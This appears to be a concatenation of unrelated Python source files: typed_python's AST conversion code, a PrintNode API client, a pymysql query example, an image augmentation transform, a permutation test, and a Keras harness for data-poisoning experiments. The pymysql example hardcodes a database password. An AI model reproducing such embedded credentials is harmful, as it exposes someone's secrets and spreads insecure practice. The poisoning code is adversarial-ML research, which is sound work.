convertAlgebraicToPyAst(pyAst)\n else:\n if pyAst.matches.Slice:\n args = {}\n\n if pyAst.lower is not None:\n args['lower'] = convertAlgebraicToPyAst(pyAst.lower)\n\n if pyAst.upper is not None:\n args['upper'] = convertAlgebraicToPyAst(pyAst.upper)\n\n if pyAst.step is not None:\n args['step'] = convertAlgebraicToPyAst(pyAst.step)\n\n return ast.Slice(**args)\n\n if pyAst.matches.Tuple:\n return ast.ExtSlice(dims=[convertAlgebraicToPyAst(x) for x in pyAst.elts])\n\n return ast.Index(convertAlgebraicToPyAst(pyAst))\n\n\ndef convertAlgebraicToPyAst_(pyAst):\n if pyAst is None:\n return None\n\n if isinstance(pyAst, (str, int, float, bool, bytes)):\n return pyAst\n\n if hasattr(pyAst, \"__typed_python_category__\") and pyAst.__typed_python_category__ == \"TupleOf\":\n return [convertAlgebraicToPyAst(x) for x in pyAst]\n\n if type(pyAst) is Expr.Str:\n return ast.Str(s=pyAst.s)\n\n if type(pyAst) is Expr.Num:\n if pyAst.n.matches.Boolean:\n return ast.NameConstant(value=True if pyAst.n.value else False)\n if pyAst.n.matches.None_:\n return ast.NameConstant(value=None)\n if pyAst.n.matches.Complex:\n return ast.Num(n=complex(pyAst.n.real, pyAst.n.imag))\n if pyAst.n.matches.Unknown:\n raise Exception(f\"Unknown constant: {pyAst.filename}:{pyAst.line_number}\")\n return ast.Num(n=pyAst.n.value)\n\n if type(pyAst) is Expr.Subscript:\n res = ast.Subscript(\n value=convertAlgebraicToPyAst(pyAst.value),\n slice=convertAlgebraicToSlice(pyAst.slice),\n ctx=convertAlgebraicToPyAst(pyAst.ctx),\n )\n\n res.lineno = pyAst.line_number\n res.col_offset = pyAst.col_offset\n\n return res\n\n if type(pyAst) is Expr.Constant:\n return reverseConverters[type(pyAst)](\n **{k: getattr(pyAst, k) for k in type(pyAst).ElementType.ElementNames if k not in ['line_number', 'col_offset']}\n )\n\n if type(pyAst) in reverseConverters:\n return reverseConverters[type(pyAst)](**convertAlgebraicArgs(pyAst, *type(pyAst).ElementType.ElementNames))\n\n assert False, type(pyAst)\n\n\ndef convertPyAstToAlgebraic(tree, fname, keepLineInformation=True):\n if issubclass(type(tree), ast.AST):\n converter = converters[type(tree)]\n args = {}\n\n for f in tree._fields:\n # type_comment was introduced in 3.8, but we don't need it\n if f != \"type_comment\":\n if hasattr(tree, f):\n args[f] = convertPyAstToAlgebraic(getattr(tree, f), fname, keepLineInformation)\n else:\n args[f] = None\n\n try:\n if keepLineInformation:\n args['line_number'] = tree.lineno\n args['col_offset'] = tree.col_offset\n args['filename'] = fname\n else:\n args['line_number'] = 0\n args['col_offset'] = 0\n args['filename'] = ''\n except AttributeError:\n pass\n\n try:\n # 'type_comment' is introduced in 3.8, but we don't need it\n # and don't do anything with it, and it's just a comment so it doesn't\n # affect execution semantics.\n if 'type_comment' in args:\n args.pop('type_comment')\n\n return converter(**args)\n except Exception:\n if 'line_number' in args:\n del args['line_number']\n del args['col_offset']\n del args['filename']\n\n try:\n return converter(**args)\n except Exception:\n raise UserWarning(\n \"Failed to construct %s from %s with arguments\\n%s\\n\\n%s\" % (\n converter,\n type(tree),\n \"\\n\".join([\n \"\\t%s:%s (from %s)\" % (\n k, repr(v)[:50], getattr(tree, k) if hasattr(tree, k) else None\n )\n for k, v in args.items()\n ]),\n traceback.format_exc()\n )\n )\n\n if isinstance(tree, list):\n return [convertPyAstToAlgebraic(x, fname, keepLineInformation) for x in tree]\n\n return tree\n\n\ndef stripDecoratorFromFuncDef(ast):\n \"\"\"Strip 
any decorator_list elements from a Statement.FunctionDef.\n\n Args:\n ast - a Statement.FunctionDef or an Expr.Lambda\n\n Returns:\n same type as ast but without any decorator_list elements.\n \"\"\"\n if not ast.matches.FunctionDef:\n return ast\n\n return Statement.FunctionDef(\n name=ast.name,\n args=ast.args,\n body=ast.body,\n decorator_list=(), # strip decorators here\n returns=ast.returns,\n line_number=ast.line_number,\n col_offset=ast.col_offset,\n filename=ast.filename,\n )\n\n\n# a map from (code) -> algebraic ast\n_codeToAlgebraicAst = {}\n_codeToAlgebraicAstWithoutLineInfo = {}\n\n\ndef convertFunctionToAlgebraicPyAst(f, keepLineInformation=True):\n # we really just care about the code itself\n if isinstance(f, types.FunctionType):\n fCode = f.__code__\n elif isinstance(f, types.CodeType):\n fCode = f\n else:\n raise Exception(\n \"convertFunctionToAlgebraicPyAst requires a function object, or a code object.\"\n )\n\n if not keepLineInformation:\n if fCode in _codeToAlgebraicAstWithoutLineInfo:\n return _codeToAlgebraicAstWithoutLineInfo[fCode]\n\n algebraic = convertFunctionToAlgebraicPyAst(f)\n\n _codeToAlgebraicAstWithoutLineInfo[fCode] = convertPyAstToAlgebraic(\n convertAlgebraicToPyAst(algebraic),\n \"\",\n False\n )\n\n return _codeToAlgebraicAstWithoutLineInfo[fCode]\n\n # check if this is in the cache already\n if fCode in _codeToAlgebraicAst:\n return _codeToAlgebraicAst[fCode]\n\n # it's not. we'll have to build it\n try:\n pyast = python_ast_util.pyAstForCode(fCode)\n except Exception:\n raise Exception(\"Failed to get source for function %s:\\n%s\" % (fCode.co_name, traceback.format_exc()))\n\n try:\n algebraicAst = convertPyAstToAlgebraic(pyast, fCode.co_filename, True)\n\n # strip any decorators from the function def. They are not actually part of the\n # definition of the code object itself\n algebraicAst = stripDecoratorFromFuncDef(algebraicAst)\n\n cacheAstForCode(fCode, algebraicAst)\n except Exception as e:\n raise Exception(\n \"Failed to convert function at %s:%s:\\n%s\"\n % (fCode.co_filename, fCode.co_firstlineno, repr(e))\n )\n\n return _codeToAlgebraicAst[fCode]\n\n\n# a memo from pyAst to the 'code' object that we evaluate to def it.\n# this is only relevant for the versions that do have line numbers\n_pyAstToCodeObjectCache = {}\n\n\ndef stripAstArgAnnotations(arg: Arg):\n return Arg.Item(\n arg=arg.arg,\n annotation=None,\n line_number=arg.line_number,\n col_offset=arg.col_offset,\n filename=arg.filename\n )\n\n\ndef stripAstArgsAnnotations(args: Arguments):\n return Arguments.Item(\n args=[stripAstArgAnnotations(x) for x in args.args],\n vararg=stripAstArgAnnotations(args.vararg) if args.vararg is not None else None,\n kwonlyargs=[stripAstArgAnnotations(x) for x in args.kwonlyargs],\n kw_defaults=args.kw_defaults,\n kwarg=stripAstArgAnnotations(args.kwarg) if args.kwarg is not None else None,\n defaults=(),\n )\n\n\ndef evaluateFunctionPyAst(pyAst, globals=None, stripAnnotations=False):\n assert isinstance(pyAst, (Expr.Lambda, Statement.FunctionDef, Statement.AsyncFunctionDef))\n\n filename = pyAst.filename\n\n if isinstance(pyAst, Statement.FunctionDef):\n # strip out the decorator definitions. 
We just want the underlying function\n # object itself.\n pyAstModule = Statement.FunctionDef(\n name=pyAst.name,\n args=stripAstArgsAnnotations(pyAst.args) if stripAnnotations else pyAst.args,\n body=pyAst.body,\n decorator_list=(),\n returns=pyAst.returns if not stripAnnotations else None,\n line_number=pyAst.line_number,\n col_offset=pyAst.col_offset,\n filename=pyAst.filename,\n )\n pyAstModule = Module.Module(body=(pyAstModule,))\n elif isinstance(pyAst, Statement.AsyncFunctionDef):\n # strip out the decorator definitions. We just want the underlying function\n # object itself.\n pyAstModule = Statement.AsyncFunctionDef(\n name=pyAst.name,\n args=stripAstArgsAnnotations(pyAst.args) if stripAnnotations else pyAst.args,\n body=pyAst.body,\n decorator_list=(),\n returns=pyAst.returns if not stripAnnotations else None,\n line_number=pyAst.line_number,\n col_offset=pyAst.col_offset,\n filename=pyAst.filename,\n )\n pyAstModule = Module.Module(body=(pyAstModule,))\n elif isinstance(pyAst, Expr):\n pyAstModule = Module.Expression(body=pyAst)\n\n globals = dict(globals) if globals is not None else {}\n\n if pyAstModule.matches.Expression:\n if pyAst not in _pyAstToCodeObjectCache:\n _pyAstToCodeObjectCache[pyAst] = compile(\n convertAlgebraicToPyAst(pyAstModule), filename, 'eval'\n )\n\n res = eval(_pyAstToCodeObjectCache[pyAst], globals)\n else:\n if pyAst not in _pyAstToCodeObjectCache:\n _pyAstToCodeObjectCache[pyAst] = compile(\n convertAlgebraicToPyAst(pyAstModule), filename, 'exec'\n )\n\n exec(_pyAstToCodeObjectCache[pyAst], globals)\n\n res = globals[pyAstModule.body[0].name]\n\n # extract any inline code constants from the resulting closure and ensure\n # that we know their definitions as well.\n cacheAstForCode(res.__code__, pyAst)\n\n return res\n\n\ndef replaceFirstComprehensionArg(pyAst):\n \"\"\"Replace the first expression in a comprehension with a '.0' varlookup.\n\n In general, when you write an expression like [x for x in EXPR] inside\n of a python function, you get an inner code object that represents the body\n of the list comprehension in the co_consts. This code object gets used to\n execute the inner stackframe of the list comprehension.\n\n That code object does not contain 'EXPR' - it assumes it gets passed that\n as a variable called '.0'. 
As a result, we need to make sure we don't embed\n that information in the code object itself.\n \"\"\"\n def stripComprehension(c: Comprehension):\n return Comprehension.Item(\n target=c.target,\n iter=Expr.Name(id=\".0\"),\n ifs=c.ifs,\n is_async=c.is_async\n )\n\n if pyAst.matches.ListComp or pyAst.matches.SetComp or pyAst.matches.GeneratorExp:\n return type(pyAst)(\n elt=pyAst.elt,\n generators=[stripComprehension(pyAst.generators[0])] + list(pyAst.generators[1:]),\n line_number=pyAst.line_number,\n col_offset=pyAst.col_offset,\n filename=pyAst.filename,\n )\n\n if pyAst.matches.DictComp:\n return type(pyAst)(\n key=pyAst.key,\n value=pyAst.value,\n generators=[stripComprehension(pyAst.generators[0])] + list(pyAst.generators[1:]),\n line_number=pyAst.line_number,\n col_offset=pyAst.col_offset,\n filename=pyAst.filename,\n )\n\n return pyAst\n\n\ndef cacheAstForCode(code, pyAst):\n \"\"\"Remember that 'code' is equivalent to pyAst, and also for contained code objects.\"\"\"\n if code in _codeToAlgebraicAst:\n return\n\n # we have to import this within the function to break the import cycle\n from typed_python.compiler.python_ast_analysis import extractFunctionDefsInOrder\n\n codeConstants = [c for c in code.co_consts if isinstance(c, types.CodeType)]\n\n if isinstance(pyAst, (Statement.FunctionDef, Expr.Lambda, Statement.ClassDef, Statement.AsyncFunctionDef)):\n funcDefs = extractFunctionDefsInOrder(pyAst.body)\n else:\n funcDefs = extractFunctionDefsInOrder(pyAst.generators)\n\n if pyAst.matches.ListComp or pyAst.matches.SetComp or pyAst.matches.GeneratorExp:\n funcDefs = extractFunctionDefsInOrder(pyAst.elt) + funcDefs\n\n if pyAst.matches.DictComp:\n funcDefs = (\n extractFunctionDefsInOrder(pyAst.key)\n + extractFunctionDefsInOrder(pyAst.value)\n + funcDefs\n )\n\n _codeToAlgebraicAst[code] = replaceFirstComprehensionArg(\n stripDecoratorFromFuncDef(pyAst)\n )\n\n assert len(funcDefs) == len(codeConstants), (\n f\"Expected {len(funcDefs)} func defs to cover the \"\n f\"{len(codeConstants)} code constants we found in \"\n f\"{code.co_name} in {code.co_filename}:{code.co_firstlineno}\"\n f\" of type {type(pyAst)}\"\n )\n\n for i in range(len(funcDefs)):\n cacheAstForCode(codeConstants[i], funcDefs[i])\n\n\ndef evaluateFunctionDefWithLocalsInCells(pyAst, globals, locals, stripAnnotations=False):\n # make a new FunctionDef that defines a function\n # def f(l1, l2, ...): #l1 ... lN in locals\n # def pyAst():\n # ...\n # return pyAst\n #\n # and then call 'f' to get the closure out\n\n # strip out the decorator definitions. 
We just want the underlying function\n # object itself.\n if pyAst.matches.FunctionDef:\n statements = [\n Statement.FunctionDef(\n name=pyAst.name,\n args=stripAstArgsAnnotations(pyAst.args) if stripAnnotations else pyAst.args,\n body=pyAst.body,\n decorator_list=(),\n returns=pyAst.returns if not stripAnnotations else None,\n line_number=pyAst.line_number,\n col_offset=pyAst.col_offset,\n filename=pyAst.filename,\n ),\n Statement.Return(value=Expr.Name(id=pyAst.name, ctx=ExprContext.Load()))\n ]\n elif pyAst.matches.AsyncFunctionDef:\n statements = [\n Statement.AsyncFunctionDef(\n name=pyAst.name,\n args=stripAstArgsAnnotations(pyAst.args) if stripAnnotations else pyAst.args,\n body=pyAst.body,\n decorator_list=(),\n returns=pyAst.returns if not stripAnnotations else None,\n line_number=pyAst.line_number,\n col_offset=pyAst.col_offset,\n filename=pyAst.filename,\n ),\n Statement.Return(value=Expr.Name(id=pyAst.name, ctx=ExprContext.Load()))\n ]\n elif pyAst.matches.GeneratorExp or pyAst.matches.ListComp or pyAst.matches.SetComp or pyAst.matches.DictComp:\n # generators and list comprehensions always become functions that yield\n # the elements of the comprehension\n if pyAst.matches.DictComp:\n bodyExpr = Expr.Tuple(elts=(pyAst.key, pyAst.value), ctx=ExprContext.Load())\n else:\n bodyExpr = pyAst.elt\n\n body = Statement.Expr(value=Expr.Yield(value=bodyExpr))\n\n for comprehension in pyAst.generators:\n for ifExpr in comprehension.ifs:\n body = Statement.If(\n test=ifExpr,\n body=[body],\n orelse=[]\n )\n\n body = Statement.For(\n target=comprehension.target,\n iter=comprehension.iter,\n body=[body]\n )\n\n statements = [\n Statement.FunctionDef(\n name=\"__typed_python_generator_builder__\",\n args=Arguments.Item(\n vararg=None,\n kwarg=None\n ),\n body=[body],\n returns=None\n ),\n Statement.Return(value=Expr.Name(id=\"__typed_python_generator_builder__\", ctx=ExprContext.Load()))\n ]\n elif pyAst.matches.Lambda:\n statements = [Statement.Return(value=pyAst)]\n else:\n raise Exception(f\"Can't build a python AST out of {type(pyAst)}\")\n\n pyAstBuilder = Statement.FunctionDef(\n name=\"__typed_python_func_builder__\",\n args=Arguments.Item(\n args=[Arg.Item(arg=name, annotation=None) for name in locals],\n vararg=None,\n kwarg=None\n ),\n body=statements,\n returns=None,\n filename=pyAst.filename\n )\n\n func = evaluateFunctionPyAst(pyAstBuilder, globals)\n\n inner = func(*[val for name, val in locals.items()])\n\n cacheAstForCode(inner.__code__, pyAst)\n\n return inner\n","repo_name":"APrioriInvestments/typed_python","sub_path":"typed_python/python_ast.py","file_name":"python_ast.py","file_ext":"py","file_size_in_byte":42100,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"61"} +{"seq_id":"31121886652","text":"import json\nimport os\nfrom typing import List, Any\n\nimport requests\nfrom dotenv import load_dotenv\nfrom requests.auth import HTTPBasicAuth\n\nfrom consts import *\nfrom models.models import Printer\n\n\nclass PrintNodeAPI:\n\n def __init__(self):\n load_dotenv()\n\n self.req = requests.Session()\n self.headers = {'Accept': 'application/json'}\n self.api_key = os.getenv(API_KEY)\n self.auth = HTTPBasicAuth('apikey', self.api_key)\n\n def get_user_data_from_printnode_api(self):\n response = self.req.get(BASE_URL + WHOAMI, headers=self.headers, auth=self.auth)\n\n return response.text\n\n def get_printers_data_from_printnode_api(self):\n res = self.req.get(BASE_URL + PRINTERS, headers=self.headers, auth=self.auth)\n\n return 
json.loads(res.text)\n\n    def get_user_data_from_printnode_api_by_key(self, api_key: str):\n        self.api_key = api_key\n        self.auth = HTTPBasicAuth('apikey', self.api_key)\n        response = self.req.get(BASE_URL + PRINTERS, headers=self.headers, auth=self.auth)\n        print(response.text)\n        return json.loads(response.text)\n\n    def post_jobs_for_print(self):\n        self.headers = {'Accept': 'application/json', \"Content-Type\": \"application/json\"}\n        self.api_key = os.getenv(API_KEY)\n        self.auth = HTTPBasicAuth('apikey', self.api_key)\n        data = {\n            \"printerId\": 34,\n            \"title\": \"My Test PrintJob\",\n            \"contentType\": \"pdf_uri\",\n            \"content\": \"http://sometest.com/pdfhere\",\n            \"source\": \"api documentation!\"\n        }\n\n        # serialize the payload so the request body matches the JSON Content-Type header\n        response = self.req.post('https://api.printnode.com/printjobs', headers=self.headers, auth=self.auth, data=json.dumps(data))\n        print(response.status_code)\n\n    @staticmethod\n    def get_printers_list(response_json: List[Any]) -> List[Printer]:\n        printers = []\n\n        for printer in response_json:\n            capabilities = printer.get('capabilities')\n\n            printers.append(\n                Printer(\n                    id=str(printer.get('id')),\n                    name=printer.get('name'),\n                    description=printer.get('description'),\n                    nickname=\"\",\n                    paper_types=str(len(capabilities.get('papers'))),\n                    state=printer.get('state')\n                )\n            )\n\n        return printers\n\n","repo_name":"Noamico123/LemosProject_BE","sub_path":"external_api_requests/printnode_api.py","file_name":"printnode_api.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24313601496","text":"'''\nfetchone()\nFunction: fetches the next row of the query result set; the result is returned as a single object\nfetchall()\nFunction: fetches all remaining rows of the result set\nrowcount: a read-only attribute that returns the number of rows affected by the execute() method\n'''\nimport pymysql\n\ndb = pymysql.connect('localhost','root','Zhl19960320','2019.01.02')\ncursor = db.cursor()\n\n# query the data\nsql = 'select * from bandcard where money>400'\ntry:\n    cursor.execute(sql)\n    relist = cursor.fetchall()\n    for row in relist:\n        print('%d--%d'%(row[0], row[1]))\nexcept:\n    # if execution fails, roll back to the previous state\n    db.rollback()\n\ncursor.close()\ndb.close()","repo_name":"HailongZeng/mypython_learning","sub_path":"25、MySQL/2、MySQL与Python交互/7、数据库查询操作.py","file_name":"7、数据库查询操作.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32350189135","text":"\"\"\" transforms/intensity_scale.py (Author: Charley Zhang, 2021) \nBrightness & contrast augmentation via scaling an image's intensity values.\n\"\"\"\n\nimport collections\nimport numbers\n\nimport numpy as np\nimport torch\n\nfrom data.transforms.transform_base import Transform\nfrom lib.utils.parse import parse_probability, parse_bool\n\n\nclass ScaleIntensity(Transform):\n    \"\"\" Samples a uniform value & multiplies image with it followed by clipping\n    of transformed image to the intensity bounds of the original image.\n    \n    (This is called brightness & contrast transformation in PGL paper)\n    Properties:\n        ✔ Tensor or Numpy Array\n        ✔ 3D ✔ 2D\n        ✔ Differentiable\n        ✔* Invertible (*information loss from clipping)\n    \"\"\"\n    \n    def __init__(self, p=1.0, scale=(0.75, 1.25), return_record=True):\n        \"\"\"\n        Args:\n            p: probability to apply this transform\n            scale: a fixed scale value or a (min, max) range of values\n                to sample from uniformly\n        \"\"\"\n        self.p = parse_probability(p, 'p')\n        self.return_record = parse_bool(return_record, 'return_record')\n        self.scale = self._parse_scale(scale)\n    \n    \n    def apply_transform(self, data, 
scale=None):\n        \"\"\"\n        Args:\n            image: dict with key 'image' that is a np.array or torch.Tensor\n                \"image\" can also be an array or tensor itself.\n            scale: if a value is given for scale, it will override any\n                preset scale or range of scales to sample from.\n        \"\"\"\n        data = self._parse_data_input(data)\n        if torch.rand((1,)).item() > self.p:\n            if self.return_record:\n                return data, None\n            return data\n        \n        # Sample scale\n        scale = self._parse_scale(scale) if scale else self.scale\n        if isinstance(scale, collections.Sequence):\n            scale = torch.rand((1,)).item() * (scale[1] - scale[0]) + scale[0]\n        \n        # Apply intensity scale transform\n        is_single_image = False\n        if isinstance(data, np.ndarray) or isinstance(data, torch.Tensor):\n            is_single_image = True\n            data = {'image': data}\n        \n        ret_data, ret_records = {}, {}\n        for k, v in data.items():\n            if 'image' in k:\n                image = v\n                image_min = image.min()\n                image_max = image.max()\n                \n                t_image = ScaleIntensity.scale_intensity(\n                    image, scale, image_min, image_max)\n                ret_data[k] = t_image\n                ret_records[k] = {\n                    'input_shape': tuple(image.shape),\n                    'output_shape': tuple(t_image.shape),\n                    'old_image_min': self.to_record_value(image_min),\n                    'old_image_max': self.to_record_value(image_max),\n                    'intensity_scale': scale\n                }\n            else:\n                ret_data[k] = v\n        \n        # Return in correct format\n        if is_single_image:\n            if self.return_record:\n                return ret_data['image'], ret_records['image']\n            return ret_data['image']\n        if self.return_record:\n            return ret_data, ret_records\n        return ret_data\n\n\n    def reapply(self, image, record):\n        scale = record['intensity_scale']\n        im_min = image.min()\n        im_max = image.max() \n        return ScaleIntensity.scale_intensity(image, scale, im_min, im_max)\n    \n    \n    def invert(self, image, record):\n        scale = record['intensity_scale']\n        ret_image = image / scale\n        return ret_image\n    \n    \n    @staticmethod\n    def scale_intensity(image, scale, clip_min, clip_max):\n        assert isinstance(image, np.ndarray) or isinstance(image, torch.Tensor)\n        \n        ret_image = image * scale\n        ret_image = ret_image.clip(clip_min, clip_max)\n        return ret_image\n\n    \n    \n    \n    \n    def _parse_scale(self, value):\n        if isinstance(value, numbers.Number):\n            return float(value)\n        elif isinstance(value, collections.Sequence):\n            msg = (f'If you give a sequence for \"scale\", it must be '\n                   f'length 2, not {len(value)}.')\n            value = tuple(value)\n            assert len(value) == 2, msg\n            \n            msg = f'1st value {value[0]} must be smaller than 2nd {value[1]}.'\n            assert value[0] <= value[1], msg\n            \n            return value\n        else:\n            msg = '\"scale\" must be a number or a sequence of 2 nums'\n            raise ValueError(msg)\n\n\n","repo_name":"charzharr/3D-medseg-pretraining","sub_path":"src/data/transforms/intensity_scale.py","file_name":"intensity_scale.py","file_ext":"py","file_size_in_byte":4673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"28238228106","text":"import unittest\n\ndef check_permutation(s1, s2):\n    if len(s1) != len(s2):\n        return False\n\n    s1_dict = {}\n    s2_dict = {}\n\n    for char in s1:\n        if char in s1_dict:\n            s1_dict[char] += 1\n        else:\n            s1_dict[char] = 1\n\n    for char in s2:\n        if char in s2_dict:\n            s2_dict[char] += 1\n        else:\n            s2_dict[char] = 1\n\n    for key, value in s1_dict.items():\n        if key not in s2_dict or value != s2_dict[key]:\n            return False\n\n    return True\n\nclass Test(unittest.TestCase):\n    def test_check_permutation(self):\n        self.assertTrue(check_permutation(\"god\", \"dog\"))\n        self.assertFalse(check_permutation(\"abcdefgh\", \"abcdefgk\"))\n\nif 
__name__==\"__main__\":\n unittest.main()\n\n","repo_name":"withinfinitedegreesoffreedom/datastructures-algorithms","sub_path":"arrays-strings/check_permutation.py","file_name":"check_permutation.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5182160226","text":"\nfrom keras.utils import to_categorical\nimport numpy as np\nimport random\nfrom attack import posioning_attack\nfrom utility import *\nimport numpy as np\nfrom keras.callbacks import EarlyStopping\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.datasets import make_moons, make_circles, make_classification\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.gaussian_process import GaussianProcessClassifier\nfrom sklearn.gaussian_process.kernels import RBF\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom sklearn.multiclass import OneVsOneClassifier\nfrom sklearn import linear_model\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.utils import shuffle\n\ndef generate_poisoning(model,dataset,training_info,parameters,functions):\n # generate the poisong data without training.\n\n poisoning_data = posioning_attack(training_info['poisoning_type'],dataset,model,training_info['poisoning_fraction'],training_info,is_load = False)\n return poisoning_data\n\n\ndef call_training(model,dataset,training_info,parameters,functions):\n # call the training method based on the parameter\n\n if training_info['training_type'] == 'normal':\n model,history = training_network(model,dataset,training_info,parameters,functions)\n elif training_info['training_type'] == 'online':\n model,history = online_training_network(model,dataset,training_info,parameters,functions)\n elif training_info['training_type'] == 'transfer':\n model,history = transfer_learning(model,dataset,training_info,parameters,functions)\n elif training_info['training_type'] == 'classification':\n model,history = training_ml_mdoel(model,dataset,training_info,parameters,functions)\n\n return model,history\n\n\n\ndef training_ml_mdoel(model,dataset,training_info,parameters,functions):\n data = load_and_generate_dataset(model,dataset,training_info,parameters,functions)\n x_train = data['x_train']\n y_train = data['y_train']\n x_test = data['x_test']\n y_test = data['y_test']\n print(x_train.shape)\n print(y_train.shape)\n print('ML Model')\n\n\n\n\n\ndef training_network(model,dataset,training_info,parameters,functions):\n # normal learning: trained the whole model with the poisoned dataset\n # input: model, dataset, training information\n # output: trained model\n\n data = load_and_generate_dataset(model,dataset,training_info,parameters,functions)\n x_train = data['x_train']\n y_train = data['y_train']\n x_test = data['x_test']\n y_test = data['y_test']\n\n x_train = np.concatenate((x_train, data['x_p']), axis=0)\n y_train = np.concatenate((y_train, data['y_p']), axis=0)\n overfitCallback = EarlyStopping(monitor='loss', min_delta=0, patience = 20)\n\n history = model.fit(x_train,y_train, 
validation_data = (x_test,y_test),epochs=10000000, callbacks=[overfitCallback], batch_size=training_info['batch_size'],verbose = training_info['print_process'])\n\n    if training_info['plot_loss']:\n        filename = training_info['dataset_name']+'_'+training_info['model_name']\n        if training_info['is_poisoning']:\n            filename = filename + '_' + training_info['poisoning_type'] + '_' + str(training_info['poisoning_fraction'])\n        save_history(history,filename)\n\n    train_acc = history.history['acc'][-1]\n    acc = history.history['val_acc'][-1]\n    train_loss = history.history['loss'][-1]\n    loss = history.history['val_loss'][-1]\n\n    print_information(model,training_info,parameters,functions,train_acc,acc,train_loss,loss)\n    return model,history.history\n\ndef online_training_network(model,dataset,training_info,parameters,functions):\n    # online learning: train the whole model on the clean dataset and update the model by each example based on the online sgd.\n    # input: model, dataset, training information\n    # output: trained model\n    data = load_and_generate_dataset(model,dataset,training_info,parameters,functions)\n    x_train = data['x_train']\n    y_train = data['y_train']\n    x_test = data['x_test']\n    y_test = data['y_test']\n    x_p = data['x_p']\n    y_p = data['y_p']\n\n    x_train = np.concatenate((x_train, data['x_p']), axis=0)\n    y_train = np.concatenate((y_train, data['y_p']), axis=0)\n\n\n    x_train, y_train = shuffle(x_train, y_train, random_state=0)\n\n    overfitCallback = EarlyStopping(monitor='loss', min_delta=0, patience = 20)\n\n    history = model.fit(x_train,y_train, validation_data = (x_test,y_test),epochs=100, callbacks=[overfitCallback], batch_size=1,verbose = training_info['print_process'])\n\n\n    train_acc = history.history['acc'][-1]\n    acc = history.history['val_acc'][-1]\n    train_loss = history.history['loss'][-1]\n    loss = history.history['val_loss'][-1]\n\n\n    print_information(model,training_info,parameters,functions,train_acc,acc,train_loss,loss)\n    return model,history.history\n\n\ndef transfer_learning(model,dataset,training_info,parameters,functions):\n    # transfer learning: train the whole model on the clean dataset, then freeze all the layers except the last layer.\n    # input: model, dataset, training information\n    # output: trained model\n    data = load_and_generate_dataset(model,dataset,training_info,parameters,functions)\n    x_train = data['x_train']\n    y_train = data['y_train']\n    x_test = data['x_test']\n    y_test = data['y_test']\n\n    overfitCallback = EarlyStopping(monitor='loss', min_delta=0, patience = 20)\n\n    history = model.fit(x_train,y_train, validation_data = (x_test,y_test),epochs=10000000, callbacks=[overfitCallback], batch_size=training_info['batch_size'],verbose = training_info['print_process'])\n\n\n    print('before training loss: %.3f' %history.history['loss'][-1])\n    print('before test loss: %.3f' % history.history['val_loss'][-1])\n    print('before training acc: %.3f' %history.history['acc'][-1])\n    print('before test acc: %.3f' %history.history['val_acc'][-1])\n\n    for layer in model.layers[:-1]:\n        layer.trainable = False\n    model.compile(optimizer=functions['optimizer'],loss=functions['loss'],metrics= functions['metrics'])\n\n    x_train = np.concatenate((x_train, data['x_p']), axis=0)\n    y_train = np.concatenate((y_train, data['y_p']), axis=0)\n\n    overfitCallback = EarlyStopping(monitor='loss', min_delta=0, patience = 20)\n\n    history = model.fit(x_train,y_train, validation_data = (x_test,y_test),epochs=10000000, callbacks=[overfitCallback], batch_size=training_info['batch_size'],verbose = 
training_info['print_process'])\n\n train_acc = history.history['acc'][-1]\n acc = history.history['val_acc'][-1]\n train_loss = history.history['loss'][-1]\n loss = history.history['val_loss'][-1]\n\n print_information(model,training_info,parameters,functions,train_acc,acc,train_loss,loss)\n return model,history.history\n\n\n\ndef load_and_generate_dataset(model,dataset,training_info,parameters,functions):\n # combine the clean dataset and poisoning dataset\n # input: model,clean dataset, training information\n # output: combined dataset\n x_train = dataset['clean_train']['X']\n y_train = dataset['clean_train']['Y']\n x_test = dataset['clean_test']['X']\n y_test = dataset['clean_test']['Y']\n x_train,y_train,x_test,y_test =convert_dataset(training_info['model_name'],x_train,y_train,x_test,y_test,training_info)\n\n if training_info['is_poisoning'] == True:\n dataset = posioning_attack(training_info['poisoning_type'],dataset,model,training_info['poisoning_fraction'],training_info,is_load=True)\n x_p = dataset[\"poisoning_data\"]['X']\n y_p = dataset[\"poisoning_data\"]['Y']\n\n if training_info['model_name'] == 'MLP':\n x_p = x_p.reshape(-1,x_train.shape[1])\n else:\n x_p = x_p.reshape(-1,x_train.shape[1],x_train.shape[2],x_train.shape[3])\n else:\n poisoning_samples = int(training_info['poisoning_fraction'] * x_train.shape[0])\n x_p = x_train[:poisoning_samples]\n y_p = y_train[:poisoning_samples]\n\n\n random_index = np.random.randint(0, x_train.shape[0],x_p.shape[0])\n\n x_train = np.delete(x_train, random_index,axis=0)\n y_train = np.delete(y_train, random_index,axis=0)\n\n data = {}\n data['x_train'] = x_train\n data['y_train'] = y_train\n data['x_test'] = x_test\n data['y_test'] = y_test\n data['x_p'] = x_p\n data['y_p'] = y_p\n return data\n\ndef print_information(model,training_info,parameters,functions,train_acc,acc,train_loss,loss):\n #print the training information\n\n print('--------------Training Information---------------')\n if training_info['print_model'] == True:\n print(model.summary())\n print('Input shape: '+ str(parameters['input_shape']))\n print('Output shape: '+ str(parameters['output_shape']))\n print('dataset: ' + training_info['dataset_name'])\n print('model name: ' + training_info['model_name'])\n print('learning_rate: '+ str(training_info['learning_rate']))\n print('batch_size: '+ str(training_info['batch_size']))\n # print('learning epochs: '+ str(training_info['training_epoch']))\n\n print('training loss: %.3f' %train_loss)\n print('test loss: %.3f' % loss)\n print('training acc: %.3f' %train_acc)\n print('test 